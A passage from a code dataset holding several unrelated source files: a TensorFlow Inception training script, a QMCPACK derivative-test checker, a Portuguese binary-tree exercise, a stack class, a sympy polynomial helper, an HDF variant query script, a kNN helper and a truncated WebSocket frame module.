(train_op, global_step, lr)\n \"\"\"\n lr = tf.Variable(config.lr, trainable=False, dtype=tf.float32)\n tf.summary.scalar('lr', lr) # sirius\n\n global_step = tf.Variable(0, trainable=False, name='global_step')\n\n \n optim = tf.train.MomentumOptimizer(lr, config.momentum,\n use_nesterov=True)\n train_op = optim.minimize(loss, global_step=global_step)\n\n return train_op, global_step, lr\n\ndef train():\n config = TrainConfig()\n ckpt_path, tflog_path, checkpoint = options(config)\n\n # prepare data\n g = tf.Graph()\n with g.as_default():\n \n with tf.device(':/cpu:0'):\n train_data = input_fn(True)\n val_data = input_fn(False)\n \n # feedable iterator: train data pipeline 和 validation data pipeline在一个session中\n train_iterator = train_data.make_one_shot_iterator()\n val_iterator = val_data.make_one_shot_iterator()\n\n handle = tf.placeholder(tf.string, shape=[])\n iterator = tf.data.Iterator.from_string_handle(handle, train_iterator.output_types, \n train_iterator.output_shapes)\n images, labels = iterator.get_next()\n \n # handle = tf.placeholder(tf.string, shape=[])\n # train_str, val_str, images, labels = get_samples(handle)\n #=======================================\n # training process\n # sirius: ValueError: not enough values to unpack (expected 3, got 2)\n # 问题:模型返回3个值,忘记添加acc_5\n loss, acc, acc_5 = model(images, labels, config, is_training=True)\n \n # Note: 在validation集合上需要设置is_training = False\n # Note: 在 tensorflow官网上用的estimator中有个input_fn\n # loss_val, acc_val, acc_5_val = model(images, labels, config, is_training=False)\n train_op, g_step, lr = optimizer(loss, config)\n \n \n # 没有直接summary(loss,acc,acc_5),是想要把训练集和验证集的统计数据分开\n # validation summary variables\n controller = TrainControl(lr, g_step) # save validation statistics\n # 只是定义,这里并没有给出更新规则\n val_loss = tf.Variable(0.0, trainable = False)\n val_acc = tf.Variable(0.0, trainable = False)\n val_acc_5 = tf.Variable(0.0, trainable = False)\n\n tf.summary.scalar('val_loss', val_loss)\n tf.summary.scalar('val_acc', val_acc)\n tf.summary.scalar('val_acc_5', val_acc_5)\n\n # train variables\n train_loss = tf.Variable(0.0, trainable = False)\n train_acc = tf.Variable(0.0, trainable = False)\n train_acc_5 = tf.Variable(0.0, trainable = False)\n\n tf.summary.scalar('train_loss', train_loss) # Note: 是这里把名字写错了,所以tensorboard画出来的图有问题\n tf.summary.scalar('train_acc', train_acc)\n tf.summary.scalar('train_acc_5', train_acc_5)\n\n # 是不包括train_init和test_init的\n init = tf.group(tf.global_variables_initializer(), tf.local_variables_initializer())\n\n [tf.summary.histogram(v.name.replace(':','_'),v) for v in tf.trainable_variables()]\n extra_updates_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n\n # Note: summary\n summ = tf.summary.merge_all()\n saver = tf.train.Saver(max_to_keep=5)\n writer = tf.summary.FileWriter(tflog_path, tf.get_default_graph())\n \n # train sess\n gpu_config = tf.ConfigProto()\n gpu_config.gpu_options.allow_growth = True\n \n # sirius: save summries every N step\n # summary_hook = tf.train.SummarySaverHook(save_steps=config.summary_interval,\n # output_dir=tflog_path, summary_op=tf.summary.merge_all())\n \n # with tf.train.MonitoredTrainingSession(hooks=[summary_hook]) as sess:\n with tf.Session(config = gpu_config) as sess:\n start_time = time.time()\n train_iterator_handle = sess.run(train_iterator.string_handle()) # 初始化 train 的 iterator\n val_iterator_handle = sess.run(val_iterator.string_handle()) # 初始化 test 的 iterator\n sess.run(init)\n \n if config.continue_train:\n saver.restore(sess, checkpoint)\n # for i in range(NUM_EPOCH): 这里取1时,count(step) = 156250 \n # 这里不需要,由于在dataset中已经dataset.repeat(NUM_EPOCHS)\n \n losses,accs,accs_5 = [],[],[] # 每个summary interval的平均损失\n train_count = 0\n summary_count = 0\n while True:\n try:\n for i in range(TRAIN_STEP_ALL): # 总共运行多少个step\n # Note: 如果每个step都运行sess.run(step) 太慢了\n step_loss, _, step, step_acc_5, step_acc, _ = sess.run([loss, train_op, g_step, acc_5, acc, extra_updates_ops],\n feed_dict={handle: train_iterator_handle})\n losses.append(step_loss)\n accs.append(step_acc)\n accs_5.append(step_acc_5)\n train_count += 1\n # print('train, step_acc_5', step_acc_5, 'step_acc', step_acc)\n # ======================================\n # calculate validation accuracy\n # ======================================\n # validation:\n # 1. feed_dict数据不同\n # 2. model计算时由于batch normalization需要设置为False\n # 3. 不需要更新权重参数等\n # Note: 在测试阶段,eval_interval 和 summary_inerval可以设置小一点\n # val_iterator_handle: 初始化时候也需要repeat, 或者这里重新初始化\n # 否则会报错 OutOfRangeError: End of sequence\n # Question: 在evaluation中用model进行计算,需要传参数is_training = False, 但是这样就会重复定义权重等参数\n if step % config.eval_interval == 0:\n val_losses, val_accs, val_accs_5 = [], [], [] # 在validation上的计算也是按batch进行计算的\n ckpt = saver.save(sess, ckpt_path + '/model', step) # ckpt文件,记录当前权重等\n \n for j in range(VAL_STEP): # 每进行一次validation需要多少个step\n # use trained weights to calculate outputs on validation dataset\n # 不需要给模型的参数加上reuse = True(变量共享)\n step_val_loss, step_val_acc, step_val_acc_5 = sess.run([loss, acc, acc_5],\n feed_dict={handle: val_iterator_handle})\n val_losses.append(step_val_loss)\n val_accs.append(step_val_acc)\n val_accs_5.append(step_val_acc_5)\n \n # 计算当前 eval_interval的validation\n mean_loss, mean_acc, mean_acc_5 = np.mean(val_losses), np.mean(val_accs), np.mean(val_accs_5)\n print('Step: {}, Validation. Loss: {:.3f}, Accuracy: {:.4f}, Accuracy_5: {:.4f}'.format(step, mean_loss, mean_acc, mean_acc_5))\n print('============================================')\n\n val_acc.load(mean_acc) # 本次evaluation计算的均值,load new value to the variable, 不会给计算图添加新的节点\n val_acc_5.load(mean_acc_5)\n val_loss.load(mean_loss)\n # controller.update_lr(sess, step) # 更新学习率\n \n if step % config.summary_interval == 0:\n # sirius: summary 需要feed_dict 否则报错\n # Error: You must feed a value for placeholder tensor 'Placeholder' with dtype string\n # summary 是 validation 数据集不够用的\n # Note: summary 这里需要加上feed_dict计算那要保存的值\n # Question: train上的accs_5都是1.0??\n # Question: summary中间用train_iterator是不是会将本身需要训练的样本也用掉了\n mean_loss, mean_acc, mean_acc_5 = np.mean(losses), np.mean(accs), np.mean(accs_5)\n train_acc.load(mean_acc) # 只有load了才会添加operation, 所以sess.run() 才有赋值,否则没有\n train_acc_5.load(mean_acc_5)\n train_loss.load(mean_loss)\n print('Iteration:{}, Training Loss:{:.3f}, Accuracy:{:.4f}, Accuracy_5:{:.4f}'.\n format(step, mean_loss,mean_acc,mean_acc_5)) # 当前summary的数据\n losses,accs,accs_5 = [],[],[] # 每个summary interval之后重置\n \n # Note: 结果是155500步骤,这里summary也用到了iterator_handle中的元素\n # writer.add_summary(sess.run(summ, feed_dict={handle: train_iterator_handle}), step)\n writer.add_summary(sess.run(summ, feed_dict={handle: train_iterator_handle}), step)\n summary_count += 1\n\n except tf.errors.OutOfRangeError:\n break\n\n print('Total time: {0} seconds.'.format(time.time()-start_time))\n print('summary_count',summary_count)\n print('train_count',train_count)\n \nif __name__ == \"__main__\":\n train()\n","repo_name":"Sirius083/tiny_imagenet","sub_path":"inception_v3/train_tiny_inception.py","file_name":"train_tiny_inception.py","file_ext":"py","file_size_in_byte":13790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71126623412","text":"#! /usr/bin/env python3\nimport re\n\ndef check_next_particle_grad_lap(mm,rel_tot,val_thr=1e-2,header='For particle'):\n \"\"\" check if particle gradient and laplacian errors are within tolerance\n assume wftest output contains the blocks such as:\nFor particle #0 at 2.77662296 2.025233638 3.660986223\nGradient = 6.68693298 -3.95727398 7.476365008\n Finite diff = 6.686934158 -3.957273925 7.476365603\n Error = -1.178022464e-06 -5.538599357e-08 -5.949851918e-07\n Relative Error = 1.761678288e-07 1.39959967e-08 7.95821487e-08\n\nLaplacian = -93.12287222\n Finite diff = -93.1228783\n Error = 6.076049388e-06 Relative Error = 6.524765449e-08\n\n Args:\n mm (mmap): memory map of wftest output file e.g. wftest.000\n rel_tot (float,optional): tolerance for relative error.\n val_thr (float,optional): threshold for significance of derivative, default is 1e-2. Derivatives below this threshold are treated as zero. This threhold exists because small error in a tiny value can result in a large relative error.\n header (str,optional): default is 'For particle'\n Returns:\n bool: success\n \"\"\"\n\n idx = mm.find(header.encode())\n if idx == -1:\n raise RuntimeError('failed to find %s'%header)\n # end if\n\n mm.seek(idx)\n mm.readline() # skip header\n\n success = True # determine success with the following checks\n\n # 1. gradient error\n idx = mm.find('Gradient'.encode())\n mm.seek(idx)\n grad_line = mm.readline().decode()\n grad_xyz = grad_line.split('=')[-1]\n try: # real values\n grad_val = map(float,grad_xyz.split())\n except: # complex values\n xyzl = re.split(r'[(,)]',grad_xyz.strip('\\n'))\n grad_real = map(float,xyzl[1::3])\n grad_imag = map(float,xyzl[2::3])\n grad_val = [grad_real[i] + 1j*grad_imag[i] for i in range(3)]\n # end try\n idx = mm.find('Relative Error'.encode())\n mm.seek(idx)\n grad_line = mm.readline().decode()\n grad_re = map(float,grad_line.split()[-3:]) # relative error\n if (sum(grad_re)>rel_tot): # check if error is significant\n if (abs(sum(grad_val))>val_thr): # ignore small absolute errors\n success = False\n # end if\n # end if\n\n # 2. laplacian error\n idx = mm.find('Laplacian'.encode())\n mm.seek(idx)\n lap_valt= mm.readline().decode().split('=')[-1]\n try: # real\n lap_val = float(lap_valt)\n except: # complex\n lapl = re.split(r'[(,)]',lap_valt.strip('\\n'))\n lap_val = float(lapl[1]) + 1j*float(lapl[2])\n # end try\n idx = mm.find('Relative Error'.encode())\n mm.seek(idx)\n lap_line = mm.readline()\n tokens = lap_line.split()\n lap_re = float(tokens[-1]) # relative error\n if (lap_re>rel_tot):\n if (abs(lap_val)>val_thr):\n success = False\n # end if\n # end if\n\n return success\n# end def\n\ndef all_lines_with_tag(mm,tag,nline_max):\n \"\"\" return a list of memory indices pointing to the start of tag \"\"\"\n mm.seek(0) # rewind file\n all_idx = []\n for iline in range(nline_max):\n idx = mm.find(tag.encode())\n if idx == -1:\n break\n # end if\n mm.seek(idx)\n all_idx.append(idx)\n mm.readline()\n # end for iline\n\n # guard\n if iline >= nline_max-1:\n raise NotImplementedError('may need to increase nline_max')\n # end if\n return all_idx\n# end def all_lines_with_tag\n\nif __name__ == '__main__':\n\n fname = 'wftest.000'\n nline_max = int(1e6) # assume fname has at most 1 million lines\n ratio_tol = 1e-6 # tolerance for ratio test\n rel_tol = 1e-3 # tolerance for relative error (0.1%)\n\n from mmap import mmap\n with open(fname,'r+') as f:\n mm = mmap(f.fileno(),0)\n # end with\n\n # 1. grade finite-difference test\n plocs = all_lines_with_tag(mm,'For particle',nline_max=nline_max)\n fsuccess = True # finite-difference test success\n for ploc in plocs:\n mm.seek(ploc)\n success = check_next_particle_grad_lap(mm,rel_tol)\n fsuccess= fsuccess&success\n # end for plocs\n\n # 2. grade ratio test\n \"\"\" use function designed for: \n Deriv Numeric Analytic Diff\n to parse:\n Particle Ratio of Ratios Computed Ratio Internal Ratio\n \"\"\"\n from check_deriv import parse_deriv_block\n data = parse_deriv_block(mm,'Particle Ratio of Ratios')\n # parse_deriv_block was not written for grad_lap, need to rename\n gl_name_map = {'Particle':'iparam','ratio':'numeric','computed':'analytic','internal':'diff'}\n rr = data[gl_name_map['ratio']]\n rsuccess = abs(sum(rr)/len(rr) - 1.) < ratio_tol\n\n if fsuccess:\n print('Finite difference test: PASS')\n else:\n print('Finite difference test: FAIL')\n if rsuccess:\n print('Ratio test: PASS')\n else:\n print('Ratio test: FAIL')\n\n if fsuccess and rsuccess:\n exit(0)\n else:\n exit(1)\n\n# end __main__\n","repo_name":"QMCPACK/qmcpack","sub_path":"tests/scripts/check_grad_lap.py","file_name":"check_grad_lap.py","file_ext":"py","file_size_in_byte":4747,"program_lang":"python","lang":"en","doc_type":"code","stars":261,"dataset":"github-code","pt":"21"} +{"seq_id":"33928545370","text":"class No:\r\n\r\n def __init__ (self, valor):\r\n self.valor = valor\r\n self.esquerda = None\r\n self.direita = None\r\n\r\n def __repr__(self):\r\n return '%s <- %s -> %s' % (self.esquerda and self.esquerda.valor, self.valor, self.esquerda and self.direita.valor)\r\n\r\nclass ArvoreBinaria:\r\n def __init__(self):\r\n self.raiz = None\r\n \r\n def inserir_em_nivel(self, valor):\r\n if self.raiz is None:\r\n self.raiz = No(valor)\r\n else: \r\n self.inserir_em_nivel_recursivo(valor, self.raiz)\r\n \r\n def inserir_em_nivel_recursivo(self, valor, no):\r\n if valor < no.valor:\r\n if no.esquerda is None:\r\n no.esquerda = No(valor)\r\n else: \r\n self.inserir_em_nivel_recursivo(valor, no.esquerda)\r\n else: \r\n if no.direita is None:\r\n no.direita = No(valor)\r\n else:\r\n self.inserir_em_nivel_recursivo(valor, no.direita)\r\n\r\n\r\n def mostrar_in_ordem(self):\r\n if self.raiz is None:\r\n print(\"A árvore está vazia!!\")\r\n return []\r\n else:\r\n return self.mostrar_in_ordem_recursivo(self.raiz)\r\n\r\n def mostrar_in_ordem_recursivo(self, no):\r\n valores_visitados = []\r\n if no is not None:\r\n if no.esquerda is not None:\r\n valores_visitados.extend(self.mostrar_in_ordem_recursivo(no.esquerda))\r\n valores_visitados.append(no.valor)\r\n if no.direita is not None:\r\n valores_visitados.extend(self.mostrar_in_ordem_recursivo(no.direita))\r\n return valores_visitados\r\n\r\n\r\n def encontrar_Nos_Filhos(self, No_Pai):\r\n \r\n no_pai = self.encontrar_no(self.raiz, No_Pai)\r\n\r\n if no_pai is None:\r\n return [] \r\n \r\n Nos_Filhos = []\r\n if no_pai.esquerda:\r\n Nos_Filhos.append(no_pai.esquerda.valor)\r\n if no_pai.direita:\r\n Nos_Filhos.append(no_pai.direita.valor)\r\n\r\n return Nos_Filhos\r\n\r\n def encontrar_no(self, no_atual, valor_alvo):\r\n if no_atual is None:\r\n return None \r\n if no_atual.valor == valor_alvo:\r\n return no_atual \r\n \r\n no_esquerdo = self.encontrar_no(no_atual.esquerda, valor_alvo)\r\n no_direito = self.encontrar_no(no_atual.direita, valor_alvo)\r\n \r\n return no_esquerdo or no_direito\r\n\r\n\r\n \r\nArvore = ArvoreBinaria()\r\n\r\n\r\n\r\nArvore.inserir_em_nivel(5)\r\nArvore.inserir_em_nivel(3)\r\nArvore.inserir_em_nivel(7)\r\nArvore.inserir_em_nivel(2)\r\nArvore.inserir_em_nivel(4)\r\nArvore.inserir_em_nivel(6)\r\nArvore.inserir_em_nivel(8)\r\n\r\n\r\n\r\nNo_Pai = int(input(\"Informe o nó que está procurando: \"))\r\nNos_Filhos = Arvore.encontrar_Nos_Filhos(No_Pai)\r\n\r\nif Nos_Filhos:\r\n print(f\"Os filhos do no {No_Pai} são: {Nos_Filhos}\")\r\nelse:\r\n print(f\"O nó {No_Pai} não foi encontrado na árvore ou Não possui filhos.\")\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"AllanOliveira2022/LISTA_ARVORE_BINARIA_N2","sub_path":"q15_Filhos.py","file_name":"q15_Filhos.py","file_ext":"py","file_size_in_byte":2970,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24026806105","text":"class stack:\r\n def __init__(self,maxsize):\r\n self.__maxsize=maxsize\r\n self.__elements=[None]*self.__maxsize\r\n self.__top=-1\r\n\r\n def is_full(self):\r\n if self.__top==self.__maxsize-1:\r\n return True \r\n else:\r\n return False\r\n def isempty(self):\r\n if self.__top==-1:\r\n return True\r\n return False\r\n def push(self,data):\r\n if self.is_full():\r\n print('the stack is full')\r\n else:\r\n self.__top+=1\r\n self.__elements[self.__top]=data\r\n \r\n \r\n","repo_name":"PRK007/GIET_TRAINING_PHASE-02","sub_path":"DSA_tnp/stack1.py","file_name":"stack1.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42659615475","text":"import rlutil\nimport rlargs\nimport readline\nimport pyosr\nimport uw_random\nimport numpy as np\nfrom six.moves import input\nfrom rlreanimator import reanimate\n\nclass OctoPlayer(object):\n def __init__(self, args):\n r = rlutil.create_renderer(args)\n # r.set_perturbation(uw_random.random_state(0.25))\n r.state = np.array(r.translate_to_unit_state(args.istateraw), dtype=np.float32)\n self.renderer = r\n self.rgb_shape = (len(r.views), r.pbufferWidth, r.pbufferHeight, 3)\n self.dactions = []\n self.action_magnitude = args.amag\n self.verify_magnitude = args.vmag\n self.target = None\n\n def __iter__(self):\n r = self.renderer\n while True:\n r.render_mvrgbd()\n yield np.copy(r.mvrgb.reshape(self.rgb_shape)[0])\n if self.target is None:\n texts = input(\"Goal State (W-Last)\").split()\n self.target = np.array(texts, dtype=np.float64)\n self.target[[3,4,5,6]] = self.target[[6,3,4,5]]\n self.target = r.translate_to_unit_state(self.target)\n DA = uw_random.DISCRETE_ACTION_NUMBER\n ns = np.zeros((DA,7))\n d = np.zeros((DA))\n for action in range(DA):\n nstate, _, ratio = r.transit_state(r.state,\n action,\n self.action_magnitude,\n self.verify_magnitude)\n ns[action] = nstate\n if ratio < 1e-4:\n d[action] = 999.9\n else:\n d[action] = pyosr.distance(nstate, self.target)\n print(\"\\tA {} NS {} Ratio {} D {}\".format(action, nstate, ratio, d[action]))\n best = np.argmax(d)\n bstate = ns[best]\n r.state = bstate\n\ndef main():\n pyosr.init()\n args = rlargs.parse()\n print(args)\n player = OctoPlayer(args)\n reanimate(player)\n\nif __name__ == '__main__':\n main()\n","repo_name":"xinyazhang/PuzzleTunnelDiscovery","sub_path":"src/RL/legacy/octogui.py","file_name":"octogui.py","file_ext":"py","file_size_in_byte":1981,"program_lang":"python","lang":"en","doc_type":"code","stars":72,"dataset":"github-code","pt":"21"} +{"seq_id":"24362405125","text":"import sympy as sp\n\n\ndef create_polynomial(monomials):\n \"\"\"\n Create a polynomial from a list of monomials, where each monomial is represented as [degrees, coefficient].\n\n Args:\n - monomials (list of lists): List of monomials, where each monomial is represented as [degrees, coefficient].\n\n Returns:\n - sympy expression: The polynomial expression.\n \"\"\"\n\n # Make sure the list of monomials is not empty\n if monomials == []:\n return 0\n\n # Compute the number of variables\n num_variables = len(monomials[0]) - 1\n\n # Create symbolic variables in a loop and store them in a list\n variables = [sp.symbols(f'x{i}') for i in range(num_variables)]\n\n polynomial = sum(coefficient * sp.prod(var**degree\n for var, degree in zip(variables, degrees))\n for *degrees, coefficient in monomials)\n\n return polynomial\n\n# Example usage:\n# if __name__ == \"__main__\":\n\n# # List of monomials, each represented as [degrees, coefficient]\n# monomials = [[1, 2, 0, 1], [1, 2, 3, 4]]\n\n# # Create the polynomial\n# polynomial = create_polynomial(monomials)\n\n# # Print the polynomial\n# print(\"Polynomial:\", polynomial)\n\ndict1 = {'a': 2, 'b': 1, 'c': 3}\ndict2 = {'b': 1, 'a': 2, 'c': 3}\nassertDictEqual(dict1, dict2)","repo_name":"teresodra/VariableOrderingInCAD","sub_path":"utils/trial.py","file_name":"trial.py","file_ext":"py","file_size_in_byte":1297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40836667215","text":"import sys, tables, csv, os\nfrom multiprocessing import Process, Pool\nimport mkHdfVarsForSample\n\nuseFields = ['isHomVar', 'refDepth', 'altDepth', 'totDepth',\n 'varFrac', 'tumorRef',\n 'tumorAlt', 'tumorTotDepth', 'tumorFrac',\n 'noCallSampleCount', 'Prob']\n\ndef filterRow(row, ref, alt):\n return row['ref'].decode(\"utf-8\") == ref \\\n and row['alt'].decode(\"utf-8\") == alt \\\n and row['isVar'] == 1\n\ndef fix_field(field):\n if \"'\" in str(field):\n return field.decode(\"utf-8\")\n return str(field)\n\ndef query_hdf(table, useFields, ref, alt, chrom, start):\n return [ [x[uf] for uf in useFields] for x in \n table.where('(chrom == %d) & (pos == %d)'\n % (chrom, start))\n if filterRow(x, ref, alt) ]\n\ndef process_row(sample, row, table, useFields, fieldNames, fout):\n start = int(row['start']) + 1\n ref = row['ref']\n alt = row['alt']\n rawChrom = row['chrom']\n chrom = mkHdfVarsForSample.mkNewChrom(rawChrom)\n resLs = query_hdf(table, useFields, ref, alt, chrom, start)\n for r in resLs:\n print('\\t'.join([ row[x] for x in fieldNames ] + [fix_field(ff) for ff in r] + [sample]),\n file=fout) \n\nasync def load_vars(args, gemini_file, file_handle, fout, field2idx, fieldNames):\n# print(field2idx)\n h5file = tables.open_file(args.hdf_file, mode=\"r\")\n table = h5file.root.posCollection.posLs\n # i = 0\n # fout = \n # print('here0')\n # with aiofiles.open(gemini_file, mode='r') as f:\n # print('here1')\n \n \n# async for line in f:\n async for line in file_handle.readlines():\n print('here0')\n sp = line.strip().split('\\t')\n if not sp[0] in field2idx:\n row = {field:sp[field2idx[field]] for field in fieldNames}\n await trio.sleep(1) #process_row(row, table, useFields, fout)\n print(gemini_file)\n # i += 1\n # if i == 100:\n # break\n\nasync def main(args):\n gemini_ls = (args.gemini_file_1, args.gemini_file_2, args.gemini_file_3,\n args.gemini_file_4, args.gemini_file_5)\n files = [open(x) for x in gemini_ls]\n out_files = [open(gemini_file + '.' + args.sample + '.tmp', 'w')\n for gemini_file in gemini_ls]\n for afile in files:\n fieldNames = afile.readline().strip().split('\\t')\n field2idx = {field:x for x,field in enumerate(fieldNames)}\n for afile in out_files:\n print('\\t'.join(fieldNames + useFields + ['sample']), file=afile)\n\n for afile in files:\n afile.close()\n\n async with trio.open_nursery() as nursery:\n print('one')\n async with aiofiles.open(args.gemini_file_1, mode='r') as f1:\n print('two')\n async with aiofiles.open(args.gemini_file_2, mode='r') as f2:\n async with aiofiles.open(args.gemini_file_3, mode='r') as f3:\n print('spawning')\n nursery.spawn(load_vars, args, gemini_file_1, f1, out_files[0], field2idx, fieldNames)\n nursery.spawn(load_vars, args, gemini_file_2, f2, out_files[1], field2idx, fieldNames)\n nursery.spawn(load_vars, args, gemini_file_3, f3, out_files[2], field2idx, fieldNames)\n # for out_file, file_handle, gemini_file in zip(out_files, files, gemini_ls):\n # nursery.spawn(load_vars, args, gemini_file, file_handle, out_file, field2idx, fieldNames)\n\n\n for afile in out_files:\n afile.close()\n\n os.system('head -1 {} > {}'.format(args.gemini_file_1 + '.' + args.sample + '.tmp',\n args.outFile))\n for gemini_file in (args.gemini_file_1, args.gemini_file_2, args.gemini_file_3,\n args.gemini_file_4, args.gemini_file_5):\n os.system('tail -n +2 {} >> {}'.format(args.gemini_file_1 + '.' + args.sample + '.tmp',\n args.outFile))\n\ndef read_file(params):\n afile_name, out_file_name, name, hdf_file, sample = params\n afile = open(afile_name)\n out_file = open(out_file_name, 'w')\n chrom = name.split('/')[-1].split('.')[0]\n # with open('shit.' + chrom + '.' + sample, 'w') as fout:\n # print('shit', file=fout)\n # print(out_file)\n # print('test2', file=out_file)\n h5file = tables.open_file(hdf_file, mode=\"r\")\n table = h5file.root.posCollection.posLs\n\n i = 0\n# stream = curio.io.FileStream(afile)\n sp = afile.readline().strip().split('\\t')\n fieldNames = sp\n field2idx = {field:x for x,field in enumerate(fieldNames)}\n print('\\t'.join(fieldNames), file=out_file)\n# print('here')\n for line in afile:\n sp = line.strip().split('\\t')\n i += 1\n row = {field:sp[field2idx[field]] for field in fieldNames}\n process_row(sample, row, table, useFields, fieldNames, out_file)\n # print(i, name)\n # if i == 1000:\n # break\n afile.close()\n out_file.close()\n\n# class myThread(threading.Thread):\n# def __init__(self, threadID, open_file, out_file, hdf_file, sample):\n# threading.Thread.__init__(self)\n# self.threadID = threadID\n# self.open_file = open_file\n# self.out_file = out_file\n# self.hdf_file = hdf_file\n# self.sample = sample\n# def run(self):\n# read_file(self.open_file, self.out_file, self.threadID, self.hdf_file, self.sample)\n\ndef test(sample, hdf_file, files, out_file):\n# open_files = [open(afile, 'r') for afile in files]\n out_files = [afile + '.' + sample + '.tmp'\n for afile in files]\n #print('test', file=out_files[0])\n\n i = 0\n pool = Pool(processes=12)\n input_ls = []\n for open_file, out_afile in zip(files, out_files):\n args = [open_file, out_afile, 't' + str(i), hdf_file, sample]\n input_ls.append(args)\n i += 1\n result = pool.map(read_file, input_ls)\n # i += 1\n # procs.append(proc)\n # proc.start()\n # for t in procs:\n # t.join()\n\n # for afile in out_files:\n # afile.close()\n\n os.system('head -1 {} > {}'.format(files[0] + '.' + sample + '.tmp',\n out_file))\n for gemini_file in files:\n os.system('tail -n +2 {} >> {}'.format(gemini_file + '.' + sample + '.tmp',\n out_file))\n # clean up tmp file\n os.system('rm ' + gemini_file + '.' + sample + '.tmp')\n\nif __name__ == \"__main__\":\n sample, hdf_file = sys.argv[1:3]\n gemini_files = sys.argv[3:-1]\n out_file = sys.argv[-1]\n\n # desc = 'Pull data for report.'\n # parser = argparse.ArgumentParser(description=desc)\n # argLs = ('sample', 'hdf_file', 'gemini_file_1', \n # 'gemini_file_2', 'gemini_file_3',\n # 'gemini_file_4', 'gemini_file_5',\n # 'out_file',)\n # for param in argLs:\n # parser.add_argument(param)\n # args = parser.parse_args()\n test(sample, hdf_file, gemini_files, out_file)\n","repo_name":"bmennis/nb_prediction","sub_path":"src/scripts/pull_hdf_mp.py","file_name":"pull_hdf_mp.py","file_ext":"py","file_size_in_byte":7020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72115341172","text":"import numpy as np\nfrom utils.utils import normalizeRows\n\ndef cos_sim(a, b):\n\t\"\"\"Takes 2 vectors a, b and returns the cosine similarity according\n\tto the definition of the dot product\n\t\"\"\"\n\tdot_product = np.dot(a, b)\n\tnorm_a = np.linalg.norm(a)\n\tnorm_b = np.linalg.norm(b)\n\n\treturn dot_product / (norm_a * norm_b)\n\ndef knn(vector, matrix, k=10):\n nearest_idx = []\n\n ### YOUR CODE\n score = []\n for index, row in enumerate(matrix):\n score.append((cos_sim(row, vector), index))\n ### END YOUR CODE\n sorted_vectors = sorted(score, key=lambda x:x[0], reverse=True)\n for i in range(k):\n nearest_idx.append(sorted_vectors[i][1])\n\n return nearest_idx\n\n","repo_name":"CYP0630/NLP_Note","sub_path":"2_word_vector/knn.py","file_name":"knn.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72966499252","text":"# encoding=UTF-8\n\nimport os\nimport struct\nimport array\n\nfrom websocket_exceptions import *\nfrom websocket_utils import validate_utf8\n\nSTATUS_NORMAL = 1000\nSTATUS_GOING_AWAY = 1001\nSTATUS_PROTOCOL_ERROR = 1002\nSTATUS_UNSUPPORTED_DATA_TYPE = 1003\nSTATUS_STATUS_NOT_AVAILABLE = 1005\nSTATUS_ABNORMAL_CLOSED = 1006\nSTATUS_INVALID_PAYLOAD = 1007\nSTATUS_POLOCY_VIOLATION = 1008\nSTATUS_MESSAGE_TOO_BIG = 1009\nSTATUS_INVALID_EXTENSION = 1010\nSTATUS_UNEXPECTED_CONDITION = 1011\nSTATUS_TLS_HANDSHAKE_ERROR = 1015\n\nVALID_CLOSE_STATUS = (STATUS_NORMAL,\n STATUS_GOING_AWAY,\n STATUS_PROTOCOL_ERROR,\n STATUS_UNSUPPORTED_DATA_TYPE,\n STATUS_INVALID_PAYLOAD,\n STATUS_POLOCY_VIOLATION,\n STATUS_MESSAGE_TOO_BIG,\n STATUS_INVALID_EXTENSION,\n STATUS_UNEXPECTED_CONDITION,)\n\nclass ABNF(object):\n\n OPCODE_CONT = 0x0\n OPCODE_TEXT = 0x1\n OPCODE_BINARY = 0x2\n OPCODE_CLOSE = 0x8\n OPCODE_PING = 0x9\n OPCODE_PONG = 0xa\n\n OPCODES = (OPCODE_CONT, OPCODE_TEXT, OPCODE_BINARY, OPCODE_CLOSE, OPCODE_PING, OPCODE_PONG)\n\n LENGTH_7 = 0x7e\n LENGTH_16 = 1 << 16\n LENGTH_63 = 1 << 63\n\n def __init__(self, fin = 0, rsv1 = 0, rsv2 = 0, rsv3 = 0,\n opcode = OPCODE_TEXT, mask = 1, data = ''):\n self.fin = fin\n self.rsv1 = rsv1\n self.rsv2 = rsv2\n self.rsv3 = rsv3\n self.opcode = opcode\n self.mask = mask\n self.data = data\n self.get_mask_key = os.urandom\n\n @staticmethod\n def create_frame(data, opcode,fin = 1):\n if opcode == ABNF.OPCODE_TEXT and isinstance(data, str):\n data = data.encode('utf-8')\n\n return ABNF(fin, 0, 0, 0, opcode, 1, data)\n\n @staticmethod\n def mask(mask_key, data):\n if isinstance(mask_key, str):\n mask_key = mask_key.encode('latin-1')\n if isinstance(data, str):\n data = data.encode('latin-1')\n\n _m = array.array('B', mask_key)\n _d = array.array('B', data)\n for i in range(len(_d)):\n _d[i] ^= _m[i % 4]\n\n return _d.tobytes()\n\n def _get_masked(self, mask_key):\n s = ABNF.mask(mask_key, self.data)\n\n if isinstance(mask_key, str):\n mask_key = mask_key.encode('utf-8')\n\n return mask_key + s\n\n def format(self):\n if any(x not in (0, 1) for x in [self.fin, self.rsv1, self.rsv2, self.rsv3]):\n raise ValueError('not 0 or 1')\n if self.opcode not in ABNF.OPCODES:\n raise ValueError('Invalid OPCODE')\n length = len(self.data)\n if length >= ABNF.LENGTH_63:\n raise ValueError('data is too long')\n\n frame_header = chr(self.fin << 7 |\n self.rsv1 << 6 | self.rsv2 << 5 | self.rsv3 << 4 |\n self.opcode)\n if length < ABNF.LENGTH_7:\n frame_header += chr(self.mask << 7 | length)\n frame_header = frame_header.encode('latin-1')\n elif length < ABNF.LENGTH_16:\n frame_header += chr(self.mask << 7 | 0x7e)\n frame_header = frame_header.encode('latin-1')\n frame_header += struct.pack('!H', length)\n else:\n frame_header += chr(self.mask << 7 | 0x7f)\n frame_header = frame_header.encode('latin-1')\n frame_header += struct.pack('!Q', length)\n\n if not self.mask:\n return frame_header + self.data\n else:\n mask_key = self.get_mask_key(4)\n return frame_header + 